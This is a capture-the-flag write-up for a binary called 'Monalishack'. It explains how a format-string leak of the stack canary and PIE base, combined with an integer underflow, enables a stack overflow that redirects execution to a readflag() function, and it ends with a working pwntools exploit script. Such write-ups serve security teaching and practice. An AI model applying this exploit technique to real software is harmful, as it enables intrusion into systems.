Vulnerabilities

This binary has three vulnerabilities :

• Format string vuln when we enter our name
• Integer underflow when we choose the number of rooms to visit
• Stack-based buffer overflow after entering rooms

Furthermore, this was a ret2win condition (thanks to readflag() function).

Leak addresses

Before the stack-based buffer overflow exploit, we have to leak canary and PIE base address.
It was possible to do so using the format string vuln with these offsets :

• %3$p : canary
• %9$p : function address in PIE

This function address was at 0x16fb of PIE base address.

Ret2win

It was possible to trigger the stack-based buffer overflow by sending -1 to the number of rooms to visit.
Then, the exploit goes this way :

• 10 bytes of offset between buffer and canary
• canary
• 8 bytes of RBP (unused)
• readflag() offset in binary + PIE base address

Exploit

from pwn import *
import time

host = "813c5bf7b00db4f393aa8480c7dafeda.chall.dvc.tf"
port = 443

elf = ELF("./Monalishack")
p = remote(host, port, ssl=True)

p.recvuntil(b"Enter your name :")
p.sendline(b"%3$p-%9$p") # Format string vuln
p.recvuntil(b"4. Quit")
p.sendline(b"1")
p.recv()
leak = p.recv().split(b'\n')[1].split(b'-')

canary, pie_leak = int(leak[0],16),int(leak[1],16)
base_pie = pie_leak - 0x16fb
p.sendline(b"3") # Third choice
p.sendline(b"-1") # Number of rooms -> integer underflow -> triggers the stack BOF
p.sendline(b'A'*10 + p64(canary) + cyclic(8) + p64(elf.sym["readflag"] + base_pie))
p.interactive()